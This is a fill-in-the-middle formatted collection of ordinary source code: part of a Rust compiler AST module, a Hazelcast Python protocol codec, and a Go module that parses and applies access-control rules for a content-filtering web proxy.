token::Plain))]; v[index].clone() } (&TtToken(sp, token::MatchNt(name, kind, name_st, kind_st)), _) => { let v = [TtToken(sp, token::SubstNt(name, name_st)), TtToken(sp, token::Colon), TtToken(sp, token::Ident(kind, kind_st))]; v[index].clone() } (&TtSequence(_, ref seq), _) => { seq.tts[index].clone() } _ => panic!("Cannot expand a token tree") } } /// Returns the `Span` corresponding to this token tree. pub fn get_span(&self) -> Span { match *self { TtToken(span, _) => span, TtDelimited(span, _) => span, TtSequence(span, _) => span, } } /// Use this token tree as a matcher to parse given tts. pub fn parse(cx: &base::ExtCtxt, mtch: &[TokenTree], tts: &[TokenTree]) -> macro_parser::NamedParseResult { // `None` is because we're not interpolating let arg_rdr = lexer::new_tt_reader_with_doc_flag(&cx.parse_sess().span_diagnostic, None, None, tts.iter().cloned().collect(), true); macro_parser::parse(cx.parse_sess(), cx.cfg(), arg_rdr, mtch) } } pub type Mac = Spanned<Mac_>; /// Represents a macro invocation. The Path indicates which macro /// is being invoked, and the vector of token-trees contains the source /// of the macro invocation. /// /// There's only one flavor, now, so this could presumably be simplified. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Mac_ { // NB: the additional ident for a macro_rules-style macro is actually // stored in the enclosing item. Oog. MacInvocTT(Path, Vec<TokenTree>, SyntaxContext), // new macro-invocation } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum StrStyle { /// A regular string, like `"foo"` CookedStr, /// A raw string, like `r##"foo"##` /// /// The uint is the number of `#` symbols used RawStr(usize) } /// A literal pub type Lit = Spanned<Lit_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum Sign { Minus, Plus } impl Sign { pub fn new<T: IntSign>(n: T) -> Sign { n.sign() } } pub trait IntSign { fn sign(&self) -> Sign; } macro_rules! doit { ($($t:ident)*) => ($(impl IntSign for $t { #[allow(unused_comparisons)] fn sign(&self) -> Sign { if *self < 0 {Minus} else {Plus} } })*) } doit! { i8 i16 i32 i64 isize u8 u16 u32 u64 usize } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum LitIntType { SignedIntLit(IntTy, Sign), UnsignedIntLit(UintTy), UnsuffixedIntLit(Sign) } impl LitIntType { pub fn suffix_len(&self) -> usize { match *self { UnsuffixedIntLit(_) => 0, SignedIntLit(s, _) => s.suffix_len(), UnsignedIntLit(u) => u.suffix_len() } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Lit_ { /// A string literal (`"foo"`) LitStr(InternedString, StrStyle), /// A byte string (`b"foo"`) LitBinary(Rc<Vec<u8>>), /// A byte char (`b'f'`) LitByte(u8), /// A character literal (`'a'`) LitChar(char), /// An integer literal (`1u8`) LitInt(u64, LitIntType), /// A float literal (`1f64` or `1E10f64`) LitFloat(InternedString, FloatTy), /// A float literal without a suffix (`1.0 or 1.0E10`) LitFloatUnsuffixed(InternedString), /// A boolean literal LitBool(bool), } // NB: If you change this, you'll probably want to change the corresponding // type structure in middle/ty.rs as well. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct MutTy { pub ty: P<Ty>, pub mutbl: Mutability, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct TypeField { pub ident: Ident, pub mt: MutTy, pub span: Span, } /// Represents a method's signature in a trait declaration, /// or in an implementation. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct MethodSig { pub unsafety: Unsafety, pub constness: Constness, pub abi: Abi, pub decl: P<FnDecl>, pub generics: Generics, pub explicit_self: ExplicitSelf, } /// Represents a method declaration in a trait declaration, possibly including /// a default implementation A trait method is either required (meaning it /// doesn't have an implementation, just a signature) or provided (meaning it /// has a default implementation). #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct TraitItem { pub id: NodeId, pub ident: Ident, pub attrs: Vec<Attribute>, pub node: TraitItem_, pub span: Span, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum TraitItem_ { ConstTraitItem(P<Ty>, Option<P<Expr>>), MethodTraitItem(MethodSig, Option<P<Block>>), TypeTraitItem(TyParamBounds, Option<P<Ty>>), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct ImplItem { pub id: NodeId, pub ident: Ident, pub vis: Visibility, pub attrs: Vec<Attribute>, pub node: ImplItem_, pub span: Span, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum ImplItem_ { ConstImplItem(P<Ty>, P<Expr>), MethodImplItem(MethodSig, P<Block>), TypeImplItem(P<Ty>), MacImplItem(Mac), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Copy)] pub enum IntTy { TyIs, TyI8, TyI16, TyI32, TyI64, } impl fmt::Debug for IntTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(self, f) } } impl fmt::Display for IntTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", ast_util::int_ty_to_string(*self, None)) } } impl IntTy { pub fn suffix_len(&self) -> usize { match *self { TyIs | TyI8 => 2, TyI16 | TyI32 | TyI64 => 3, } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Copy)] pub enum UintTy { TyUs, TyU8, TyU16, TyU32, TyU64, } impl UintTy { pub fn suffix_len(&self) -> usize { match *self { TyUs | TyU8 => 2, TyU16 | TyU32 | TyU64 => 3, } } } impl fmt::Debug for UintTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(self, f) } } impl fmt::Display for UintTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", ast_util::uint_ty_to_string(*self, None)) } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Copy)] pub enum FloatTy { TyF32, TyF64, } impl fmt::Debug for FloatTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(self, f) } } impl fmt::Display for FloatTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", ast_util::float_ty_to_string(*self)) } } impl FloatTy { pub fn suffix_len(&self) -> usize { match *self { TyF32 | TyF64 => 3, // add F128 handling here } } } // Bind a type to an associated type: `A=Foo`. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct TypeBinding { pub id: NodeId, pub ident: Ident, pub ty: P<Ty>, pub span: Span, } // NB PartialEq method appears below. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub struct Ty { pub id: NodeId, pub node: Ty_, pub span: Span, } impl fmt::Debug for Ty { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "type({})", pprust::ty_to_string(self)) } } /// Not represented directly in the AST, referred to by name through a ty_path. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum PrimTy { TyInt(IntTy), TyUint(UintTy), TyFloat(FloatTy), TyStr, TyBool, TyChar } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct BareFnTy { pub unsafety: Unsafety, pub abi: Abi, pub lifetimes: Vec<LifetimeDef>, pub decl: P<FnDecl> } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] /// The different kinds of types recognized by the compiler pub enum Ty_ { TyVec(P<Ty>), /// A fixed length array (`[T; n]`) TyFixedLengthVec(P<Ty>, P<Expr>), /// A raw pointer (`*const T` or `*mut T`) TyPtr(MutTy), /// A reference (`&'a T` or `&'a mut T`) TyRptr(Option<Lifetime>, MutTy), /// A bare function (e.g. `fn(usize) -> bool`) TyBareFn(P<BareFnTy>), /// A tuple (`(A, B, C, D,...)`) TyTup(Vec<P<Ty>> ), /// A path (`module::module::...::Type`), optionally /// "qualified", e.g. `<Vec<T> as SomeTrait>::SomeType`. /// /// Type parameters are stored in the Path itself TyPath(Option<QSelf>, Path), /// Something like `A+B`. Note that `B` must always be a path. TyObjectSum(P<Ty>, TyParamBounds), /// A type like `for<'a> Foo<&'a Bar>` TyPolyTraitRef(TyParamBounds), /// No-op; kept solely so that we can pretty-print faithfully TyParen(P<Ty>), /// Unused for now TyTypeof(P<Expr>), /// TyInfer means the type should be inferred instead of it having been /// specified. This can appear anywhere in a type. TyInfer, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum AsmDialect { AsmAtt, AsmIntel } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct InlineAsm { pub asm: InternedString, pub asm_str_style: StrStyle, pub outputs: Vec<(InternedString, P<Expr>, bool)>, pub inputs: Vec<(InternedString, P<Expr>)>, pub clobbers: Vec<InternedString>, pub volatile: bool, pub alignstack: bool, pub dialect: AsmDialect, pub expn_id: ExpnId, } /// represents an argument in a function header #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Arg { pub ty: P<Ty>, pub pat: P<Pat>, pub id: NodeId, } impl Arg { pub fn new_self(span: Span, mutability: Mutability, self_ident: Ident) -> Arg { let path = Spanned{span:span,node:self_ident}; Arg { // HACK(eddyb) fake type for the self argument. ty: P(Ty { id: DUMMY_NODE_ID, node: TyInfer, span: DUMMY_SP, }), pat: P(Pat { id: DUMMY_NODE_ID, node: PatIdent(BindByValue(mutability), path, None), span: span }), id: DUMMY_NODE_ID } } } /// Represents the header (not the body) of a function declaration #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct FnDecl { pub inputs: Vec<Arg>, pub output: FunctionRetTy, pub variadic: bool } #[derive(Copy, Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Unsafety { Unsafe, Normal, } #[derive(Copy, Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Constness { Const, NotConst, } impl fmt::Display for Unsafety { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(match *self { Unsafety::Normal => "normal", Unsafety::Unsafe => "unsafe", }, f) } } #[derive(Copy, Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub enum ImplPolarity { /// `impl Trait for Type` Positive, /// `impl !Trait for Type` Negative, } impl fmt::Debug for ImplPolarity { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { ImplPolarity::Positive => "positive".fmt(f), ImplPolarity::Negative => "negative".fmt(f), } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum FunctionRetTy { /// Functions with return type `!`that always /// raise an error or exit (i.e. never return to the caller) NoReturn(Span), /// Return type is not specified. /// /// Functions default to `()` and /// closures default to inference. Span points to where return /// type would be inserted. DefaultReturn(Span), /// Everything else Return(P<Ty>), } impl FunctionRetTy { pub fn span(&self) -> Span { match *self { NoReturn(span) => span, DefaultReturn(span) => span, Return(ref ty) => ty.span } } } /// Represents the kind of 'self' associated with a method #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum ExplicitSelf_ { /// No self SelfStatic, /// `self` SelfValue(Ident), /// `&'lt self`, `&'lt mut self` SelfRegion(Option<Lifetime>, Mutability, Ident), /// `self: TYPE` SelfExplicit(P<Ty>, Ident), } pub type ExplicitSelf = Spanned<ExplicitSelf_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Mod { /// A span from the first token past `{` to the last token until `}`. /// For `mod foo;`, the inner span ranges from the first token /// to the last token in the external file. pub inner: Span, pub items: Vec<P<Item>>, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct ForeignMod { pub abi: Abi, pub items: Vec<P<ForeignItem>>, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct VariantArg { pub ty: P<Ty>, pub id: NodeId, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum VariantKind { /// Tuple variant, e.g. `Foo(A, B)` TupleVariantKind(Vec<VariantArg>), /// Struct variant, e.g. `Foo {x: A, y: B}` StructVariantKind(P<StructDef>), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct EnumDef { pub variants: Vec<P<Variant>>, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Variant_ { pub name: Ident, pub attrs: Vec<Attribute>, pub kind: VariantKind, pub id: NodeId, /// Explicit discriminant, eg `Foo = 1` pub disr_expr: Option<P<Expr>>, pub vis: Visibility, } pub type Variant = Spanned<Variant_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum PathListItem_ { PathListIdent { name: Ident, id: NodeId }, PathListMod { id: NodeId } } impl PathListItem_ { pub fn id(&self) -> NodeId { match *self { PathListIdent { id, .. } | PathListMod { id } => id } } } pub type PathListItem = Spanned<PathListItem_>; pub type ViewPath = Spanned<ViewPath_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum ViewPath_ { /// `foo::bar::baz as quux` /// /// or just /// /// `foo::bar::baz` (with `as baz` implicitly on the right) ViewPathSimple(Ident, Path), /// `foo::bar::*` ViewPathGlob(Path), /// `foo::bar::{a,b,c}` ViewPathList(Path, Vec<PathListItem>) } /// Meta-data associated with an item pub type Attribute = Spanned<Attribute_>; /// Distinguishes between Attributes that decorate items and Attributes that /// are contained as statements within items. These two cases need to be /// distinguished for pretty-printing. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum AttrStyle { AttrOuter, AttrInner, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub struct AttrId(pub usize); /// Doc-comments are promoted to attributes that have is_sugared_doc = true #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Attribute_ { pub id: AttrId, pub style: AttrStyle, pub value: P<MetaItem>, pub is_sugared_doc: bool, } /// TraitRef's appear in impls. /// /// resolve maps each TraitRef's ref_id to its defining trait; that's all /// that the ref_id is for. The impl_id maps to the "self type" of this impl. /// If this impl is an ItemImpl, the impl_id is redundant (it could be the /// same as the impl's node id). #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct TraitRef { pub path: Path, pub ref_id: NodeId, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct PolyTraitRef { /// The `'a` in `<'a> Foo<&'a T>` pub bound_lifetimes: Vec<LifetimeDef>, /// The `Foo<&'a T>` in `<'a> Foo<&'a T>` pub trait_ref: TraitRef, pub span: Span, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum Visibility { Public, Inherited, } impl Visibility { pub fn inherit_from(&self, parent_visibility: Visibility) -> Visibility { match self { &Inherited => parent_visibility, &Public => *self } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct StructField_ { pub kind: StructFieldKind, pub id: NodeId, pub ty: P<Ty>, pub attrs: Vec<Attribute>, } impl StructField_ { pub fn ident(&self) -> Option<Ident> { match self.kind { NamedField(ref ident, _) => Some(ident.clone()), UnnamedField(_) => None } } } pub type StructField = Spanned<StructField_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum StructFieldKind { NamedField(Ident, Visibility), /// Element of a tuple-like struct UnnamedField(Visibility), } impl StructFieldKind { pub fn is_unnamed(&self) -> bool { match *self { UnnamedField(..) => true, NamedField(..) => false, } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct StructDef { /// Fields, not including ctor pub fields: Vec<StructField>, /// ID of the constructor. This is only used for tuple- or enum-like /// structs. pub ctor_id: Option<NodeId>, } /* FIXME (#3300): Should allow items to be anonymous. Right now we just use dummy names for anon items. */ /// An item /// /// The name might be a dummy name in case of anonymous items #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Item { pub ident: Ident, pub attrs: Vec<Attribute>, pub id: NodeId, pub node: Item_, pub vis: Visibility, pub span: Span, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Item_ { /// An`extern crate` item, with optional original crate name, /// /// e.g. `extern crate foo` or `extern crate foo_bar as foo` ItemExternCrate(Option<Name>), /// A `use` or `pub use` item ItemUse(P<ViewPath>), /// A `static` item ItemStatic(P<Ty>, Mutability, P<Expr>), /// A `const` item ItemConst(P<Ty>, P<Expr>), /// A function declaration ItemFn(P<FnDecl>, Unsafety, Constness, Abi, Generics, P<Block>), /// A module ItemMod(Mod), /// An external module ItemForeignMod(ForeignMod), /// A type alias, e.g. `type Foo = Bar<u8>` ItemTy(P<Ty>, Generics), /// An enum definition, e.g. `enum Foo<A, B> {C<A>, D<B>}` ItemEnum(EnumDef, Generics), /// A struct definition, e.g. `struct Foo<A> {x: A}` ItemStruct(P<StructDef>, Generics), /// Represents a Trait Declaration ItemTrait(Unsafety, Generics, TyParamBounds, Vec<P<TraitItem>>), // Default trait implementations /// // `impl Trait for .. {}` ItemDefaultImpl(Unsafety, TraitRef), /// An implementation, eg `impl<A> Trait for Foo { .. }` ItemImpl(Unsafety, ImplPolarity, Generics, Option<TraitRef>, // (optional) trait this impl implements P<Ty>, // self Vec<P<ImplItem>>), /// A macro invocation (which includes macro definition) ItemMac(Mac), } impl Item_ { pub fn descriptive_variant(&self) -> &str { match *self { ItemExternCrate(..) => "extern crate", ItemUse(..) => "use", ItemStatic(..) => "static item", ItemConst(..) => "constant item", ItemFn(..) => "function", ItemMod(..) => "module", ItemForeignMod(..) => "foreign module", ItemTy(..) => "type alias", ItemEnum(..) => "enum", ItemStruct(..) => "struct", ItemTrait(..) => "trait", ItemMac(..) | ItemImpl(..) | ItemDefaultImpl(..) => "item" } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct ForeignItem { pub ident: Ident, pub attrs: Vec<Attribute>, pub node: ForeignItem_, pub id: NodeId, pub span: Span, pub vis: Visibility, } /// An item within an `extern` block #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum ForeignItem_ { /// A foreign function ForeignItemFn(P<FnDecl>, Generics), /// A foreign static item (`static ext: u8`), with optional mutability /// (the boolean is true when mutable) ForeignItemStatic(P<Ty>, bool), } impl ForeignItem_ { pub fn descriptive_variant(&self) -> &str { match *self { ForeignItemFn(..) => "foreign function", ForeignItemStatic(..) => "foreign static item" } } } /// The data we save and restore about an inlined item or method. This is not /// part of the AST that we parse from a file, but it becomes part of the tree /// that we trans. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum InlinedItem { IIItem(P<Item>), IITraitItem(DefId /* impl id */, P<TraitItem>), IIImplItem(DefId /* impl id */, P<ImplItem>), IIForeign(P<ForeignItem>), } /// A macro definition, in this crate or imported from another. /// /// Not parsed directly, but created on macro import or `macro_rules!` expansion. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct MacroDef { pub ident: Ident, pub attrs: Vec<Attribute>, pub id: NodeId, pub span: Span, pub imported_from: Option<Ident>, pub export: bool, pub use_locally: bool, pub allow_internal_unstable: bool, pub body: Vec<TokenTree>, } #[cfg(test)] mod tests { use serialize; use super::*; // are ASTs encodable? #[test] fn check_asts_encodable() { fn assert_encodable<T: serialize::Encodable>() {} assert_encodable::<Crate>(); } }<|fim▁end|>
AngleBracketedParameters(AngleBracketedParameterData), /// The `(A,B)` and `C` in `Foo(A,B) -> C` ParenthesizedParameters(ParenthesizedParameterData), }
<|file_name|>map_remove_entry_listener_codec.py<|end_file_name|><|fim▁begin|>from hazelcast.serialization.bits import * from hazelcast.protocol.client_message import ClientMessage from hazelcast.protocol.custom_codec import * from hazelcast.util import ImmutableLazyDataList from hazelcast.protocol.codec.map_message_type import * REQUEST_TYPE = MAP_REMOVEENTRYLISTENER RESPONSE_TYPE = 101 RETRYABLE = True def calculate_size(name, registration_id): """ Calculates the request payload size""" data_size = 0 data_size += calculate_size_str(name) data_size += calculate_size_str(registration_id) return data_size def encode_request(name, registration_id): """ Encode request into client_message""" client_message = ClientMessage(payload_size=calculate_size(name, registration_id)) client_message.set_message_type(REQUEST_TYPE) client_message.set_retryable(RETRYABLE) client_message.append_str(name) client_message.append_str(registration_id) client_message.update_frame_length() return client_message <|fim▁hole|> parameters = dict(response=None) parameters['response'] = client_message.read_bool() return parameters<|fim▁end|>
def decode_response(client_message, to_object=None): """ Decode response from client message"""
<|file_name|>acl.go<|end_file_name|><|fim▁begin|>package main import ( "bufio" "bytes" "errors" "fmt" "io" "log" "mime" "net" "net/http" "net/url" "os" "path/filepath" "regexp" "strconv" "strings" "time" ) // Access Control Lists (ACLs) // An ACLDefinitions object contains information about how to assign ACLs to a // request. type ACLDefinitions struct { ConnectPorts map[int][]string ContentTypes map[string][]string Methods map[string][]string Referers map[string][]string StatusCodes map[int][]string URLs *URLMatcher URLTags map[string][]string UserIPAddresses map[string][]string UserIPRanges []rangeToGroup UserNames map[string][]string Times []struct { schedule WeeklySchedule acl string } UserAgents []struct { regexp *regexp.Regexp acl string } Descriptions map[string]string Actions []ACLActionRule } var errEmptyACLRule = errors.New("empty ACL rule") // AddRule adds a rule to an ACL. func (a *ACLDefinitions) AddRule(acl string, newRule []string) error { if len(newRule) == 0 { return errEmptyACLRule } keyword := newRule[0] args := newRule[1:] switch keyword { case "connect-port": if a.ConnectPorts == nil { a.ConnectPorts = make(map[int][]string) } for _, port := range args { p, err := strconv.Atoi(port) if err != nil { return err } a.ConnectPorts[p] = append(a.ConnectPorts[p], acl) } case "content-type": if a.ContentTypes == nil { a.ContentTypes = make(map[string][]string) } for _, ct := range args { a.ContentTypes[ct] = append(a.ContentTypes[ct], acl) } case "method": if a.Methods == nil { a.Methods = make(map[string][]string) } for _, m := range args { a.Methods[m] = append(a.Methods[m], acl) } case "referer", "referrer": if a.URLs == nil { a.URLs = newURLMatcher() } if a.Referers == nil { a.Referers = make(map[string][]string) } for _, u := range args { u = strings.ToLower(u) a.URLs.AddRule(rule{t: urlMatch, content: u}) a.Referers[u] = append(a.Referers[u], acl) } case "http-status": if a.StatusCodes == nil { a.StatusCodes = make(map[int][]string) } for _, s := range args { status, err := strconv.Atoi(s) if err != nil { return fmt.Errorf("invalid HTTP status code: %q", s) } a.StatusCodes[status] = append(a.StatusCodes[status], acl) } case "time": s, err := ParseWeeklySchedule(args) if err != nil { return err } a.Times = append(a.Times, struct { schedule WeeklySchedule acl string }{s, acl}) case "url": if a.URLs == nil { a.URLs = newURLMatcher() } if a.URLTags == nil { a.URLTags = make(map[string][]string) } for _, u := range args { u = strings.ToLower(u) a.URLs.AddRule(rule{t: urlMatch, content: u}) a.URLTags[u] = append(a.URLTags[u], acl) } case "user-agent": exp := strings.Join(args, " ") r, err := regexp.Compile(exp) if err != nil { return err } a.UserAgents = append(a.UserAgents, struct { regexp *regexp.Regexp acl string }{r, acl}) case "user-ip": if a.UserIPAddresses == nil { a.UserIPAddresses = make(map[string][]string) } for _, addr := range args { if ip := net.ParseIP(addr); ip != nil { s := ip.String() a.UserIPAddresses[s] = append(a.UserIPAddresses[s], acl) continue } r, err := ParseIPRange(addr) if err != nil { return fmt.Errorf("invalid IP address or range: %s", addr) } a.UserIPRanges = append(a.UserIPRanges, rangeToGroup{r, acl}) } case "user-name": if a.UserNames == nil { a.UserNames = make(map[string][]string) } for _, name := range args { a.UserNames[name] = append(a.UserNames[name], acl) } default: return fmt.Errorf("unknown ACL rule keyword: %s", keyword) } return nil } // load loads ACL definitions and actions from a file. func (a *ACLDefinitions) load(filename string) error { f, err := os.Open(filename) if err != nil { return err } defer f.Close() scanner := bufio.NewScanner(f) lineNo := 0 for scanner.Scan() { lineNo++ line := scanner.Text() words := strings.Fields(line) for i, w := range words { if strings.HasPrefix(w, "#") { words = words[:i] break } } if len(words) == 0 { continue } action := words[0] args := words[1:] switch action { case "acl": // Define an ACL. if len(args) < 2 { log.Printf("Incomplete ACL definition at %s, line %d", filename, lineNo) continue } err = a.AddRule(args[0], args[1:]) if err != nil { log.Printf("Error at %s, line %d: %v", filename, lineNo, err) } case "describe": // Give an acl a description for the block page. if len(args) < 2 { log.Printf("Incomplete ACL description at %s, line %d", filename, lineNo) continue } if a.Descriptions == nil { a.Descriptions = make(map[string]string) } a.Descriptions[args[0]] = strings.Join(args[1:], " ") case "include": for _, file := range args { if !filepath.IsAbs(file) { file = filepath.Join(filepath.Dir(filename), file) } err := a.load(file) if err != nil { log.Printf("Error including acl file %s: %v", file, err) } } case "allow", "block", "block-invisible", "censor-words", "disable-proxy-headers", "hash-image", "ignore-category", "phrase-scan", "require-auth", "ssl-bump": r := ACLActionRule{Action: action} argLoop:<|fim▁hole|> case '!': r.Disallowed = append(r.Disallowed, a[1:]) case '"': // Parse a description string. quoted := line[strings.Index(line, a):] _, err := fmt.Sscanf(quoted, "%q", &r.Description) if err != nil { log.Printf("Invalid quoted string at %s, line %d: %q", filename, lineNo, quoted) } break argLoop default: r.Needed = append(r.Needed, a) } } a.Actions = append(a.Actions, r) default: log.Printf("Invalid ACL action at %s, line %d: %s", filename, lineNo, action) } } return scanner.Err() } // requestACLs returns the set of ACLs that apply to r. func (a *ACLDefinitions) requestACLs(r *http.Request, user string) map[string]bool { acls := make(map[string]bool) if host, _, err := net.SplitHostPort(r.RemoteAddr); err == nil { if ip := net.ParseIP(host); ip != nil { for _, a := range a.UserIPAddresses[ip.String()] { acls[a] = true } for _, r := range a.UserIPRanges { if r.r.Contains(ip) { acls[r.group] = true } } } } if user != "" { for _, a := range a.UserNames[user] { acls[a] = true } } for _, a := range a.Methods[r.Method] { acls[a] = true } if r.Method == "CONNECT" { _, port, err := net.SplitHostPort(r.Host) if err != nil { port = "443" } p, err := strconv.Atoi(port) if err != nil { p = 443 } for _, a := range a.ConnectPorts[p] { acls[a] = true } } now := time.Now() for _, t := range a.Times { if t.schedule.Contains(now) { acls[t.acl] = true } } if a.URLs != nil { for match := range a.URLs.MatchingRules(r.URL) { for _, acl := range a.URLTags[match.content] { acls[acl] = true } } if referer := r.Header.Get("Referer"); referer != "" { refURL, err := url.Parse(referer) if err == nil { for match := range a.URLs.MatchingRules(refURL) { for _, acl := range a.Referers[match.content] { acls[acl] = true } } } } } if userAgent := r.Header.Get("User-Agent"); userAgent != "" { for _, u := range a.UserAgents { if u.regexp.MatchString(userAgent) { acls[u.acl] = true } } } return acls } // responseACLs returns the set of ACLs that apply to resp. func (a *ACLDefinitions) responseACLs(resp *http.Response) map[string]bool { acls := make(map[string]bool) ct, _, _ := mime.ParseMediaType(resp.Header.Get("Content-Type")) switch ct { case "unknown/unknown", "application/unknown", "*/*", "": // These types tend to be used for content whose type is unknown, // so we should try to second-guess them. preview := make([]byte, 512) n, _ := resp.Body.Read(preview) preview = preview[:n] if n > 0 { ct, _, _ = mime.ParseMediaType(http.DetectContentType(preview)) log.Printf("Detected Content-Type as %q for %v", ct, resp.Request.URL) // Make the preview data available for re-reading. var rc struct { io.Reader io.Closer } rc.Reader = io.MultiReader(bytes.NewReader(preview), resp.Body) rc.Closer = resp.Body resp.Body = rc } } for _, acl := range a.ContentTypes[ct] { acls[acl] = true } slash := strings.Index(ct, "/") if slash != -1 { generic := ct[:slash+1] + "*" for _, acl := range a.ContentTypes[generic] { acls[acl] = true } } status := resp.StatusCode for _, acl := range a.StatusCodes[status] { acls[acl] = true } // Also include the general status code category (multiple of 100). status = status / 100 * 100 for _, acl := range a.StatusCodes[status] { acls[acl] = true } return acls } // An ACLActionRule specifies an action that will be performed if a request // belongs to a certain set of ACLs. type ACLActionRule struct { // Action is the name of the action that will be taken. Action string // Needed is a list of ACLs that the request must belong to. Needed []string // Disallowed is a list of ACLs that the request must not belong to. Disallowed []string // Description is an explanation of why the action was chosen, suitable for // display to end users. Description string } // Conditions returns a string summarizing r's conditions. func (r ACLActionRule) Conditions() string { var desc []string for _, a := range r.Needed { desc = append(desc, a) } for _, a := range r.Disallowed { desc = append(desc, "!"+a) } return strings.Join(desc, " ") } // ChooseACLAction returns the first ACL action rule that // matches acls and has an action in actions. If no rule matches, it returns // a blank rule. func (a *ACLDefinitions) ChooseACLAction(acls map[string]bool, actions ...string) ACLActionRule { choices := make(map[string]bool, len(actions)) for _, a := range actions { choices[a] = true } ruleLoop: for _, r := range a.Actions { if !choices[r.Action] { continue ruleLoop } for _, a := range r.Needed { if !acls[a] { continue ruleLoop } } for _, a := range r.Disallowed { if acls[a] { continue ruleLoop } } return r } return ACLActionRule{} } func copyACLSet(a map[string]bool) map[string]bool { b := make(map[string]bool) for k, v := range a { if v { b[k] = true } } return b } func unionACLSets(sets ...map[string]bool) map[string]bool { b := make(map[string]bool) for _, a := range sets { for k, v := range a { if v { b[k] = true } } } return b } // ChooseACLCategoryAction is like ChooseACLAction, except that it also takes // a list of categories. The first category in the list is added to the set of // ACLs. If the result is empty, the default action for that category will be // used. Then if the result is "ignore-category", the process will be 